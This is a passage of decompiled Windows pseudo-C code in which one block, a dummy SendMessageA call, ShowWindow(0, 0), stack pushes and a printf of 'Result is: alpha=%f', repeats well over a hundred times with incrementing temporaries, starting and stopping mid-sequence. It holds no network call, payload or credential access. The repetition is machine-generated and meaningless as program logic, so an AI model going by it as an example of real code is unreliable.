						_t978 = _t977 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t978 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t979 = _t978 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t979 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t980 = _t979 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t980 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t981 = _t980 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t981 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t982 = _t981 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t982 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t983 = _t982 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t983 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t984 = _t983 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t984 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t985 = _t984 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t985 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t986 = _t985 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t986 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t987 = _t986 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t987 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t988 = _t987 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t988 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t989 = _t988 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t989 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t990 = _t989 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t990 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t991 = _t990 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t991 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t992 = _t991 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t992 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t993 = _t992 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t993 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t994 = _t993 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t994 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t995 = _t994 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t995 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t996 = _t995 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t996 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t997 = _t996 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t997 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t998 = _t997 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t998 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t999 = _t998 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t999 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1000 = _t999 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1000 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1001 = _t1000 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1001 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1002 = _t1001 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1002 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1003 = _t1002 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1003 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1004 = _t1003 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1004 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1005 = _t1004 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1005 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1006 = _t1005 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1006 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1007 = _t1006 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1007 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1008 = _t1007 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1008 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1009 = _t1008 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1009 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1010 = _t1009 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1010 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1011 = _t1010 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1011 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1012 = _t1011 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1012 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1013 = _t1012 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1013 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1014 = _t1013 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1014 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1015 = _t1014 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1015 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1016 = _t1015 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1016 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1017 = _t1016 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1017 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1018 = _t1017 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1018 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1019 = _t1018 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1019 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1020 = _t1019 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1020 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1021 = _t1020 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1021 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1022 = _t1021 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1022 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1023 = _t1022 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1023 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1024 = _t1023 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1024 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1025 = _t1024 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1025 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1026 = _t1025 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1026 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1027 = _t1026 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1027 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1028 = _t1027 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1028 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1029 = _t1028 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1029 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1030 = _t1029 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1030 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1031 = _t1030 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1031 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1032 = _t1031 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1032 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1033 = _t1032 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1033 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1034 = _t1033 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1034 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1035 = _t1034 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1035 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1036 = _t1035 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1036 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1037 = _t1036 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1037 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1038 = _t1037 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1038 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1039 = _t1038 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1039 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1040 = _t1039 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1040 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1041 = _t1040 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1041 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1042 = _t1041 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1042 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1043 = _t1042 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1043 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1044 = _t1043 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1044 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1045 = _t1044 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1045 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1046 = _t1045 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1046 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1047 = _t1046 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1047 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1048 = _t1047 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1048 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1049 = _t1048 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1049 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1050 = _t1049 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1050 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1051 = _t1050 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1051 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1052 = _t1051 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1052 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1053 = _t1052 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1053 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1054 = _t1053 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1054 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1055 = _t1054 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1055 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1056 = _t1055 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1056 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1057 = _t1056 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1057 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1058 = _t1057 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1058 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1059 = _t1058 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1059 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1060 = _t1059 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1060 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1061 = _t1060 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1061 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1062 = _t1061 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1062 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1063 = _t1062 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1063 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1064 = _t1063 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1064 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1065 = _t1064 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1065 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1066 = _t1065 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1066 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1067 = _t1066 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1067 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1068 = _t1067 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1068 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1069 = _t1068 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1069 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1070 = _t1069 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1070 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1071 = _t1070 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1071 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1072 = _t1071 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1072 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1073 = _t1072 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1073 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1074 = _t1073 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1074 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1075 = _t1074 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1075 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1076 = _t1075 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1076 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1077 = _t1076 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1077 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1078 = _t1077 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1078 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1079 = _t1078 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1079 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1080 = _t1079 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1080 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1081 = _t1080 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1081 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1082 = _t1081 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1082 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1083 = _t1082 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1083 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1084 = _t1083 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1084 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1085 = _t1084 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1085 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1086 = _t1085 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1086 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1087 = _t1086 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1087 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1088 = _t1087 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1088 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1089 = _t1088 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1089 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1090 = _t1089 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1090 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1091 = _t1090 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1091 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1092 = _t1091 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1092 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1093 = _t1092 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1093 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1094 = _t1093 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1094 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1095 = _t1094 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1095 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1096 = _t1095 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1096 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1097 = _t1096 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1097 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1098 = _t1097 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1098 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1099 = _t1098 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1099 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1100 = _t1099 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1100 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1101 = _t1100 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1101 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1102 = _t1101 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1102 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1103 = _t1102 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1103 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1104 = _t1103 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1104 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1105 = _t1104 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1105 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1106 = _t1105 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1106 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1107 = _t1106 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1107 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1108 = _t1107 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1108 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1109 = _t1108 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1109 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1110 = _t1109 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1110 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1111 = _t1110 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1111 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1112 = _t1111 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1112 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1113 = _t1112 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1113 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1114 = _t1113 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1114 =  *0x42c148;
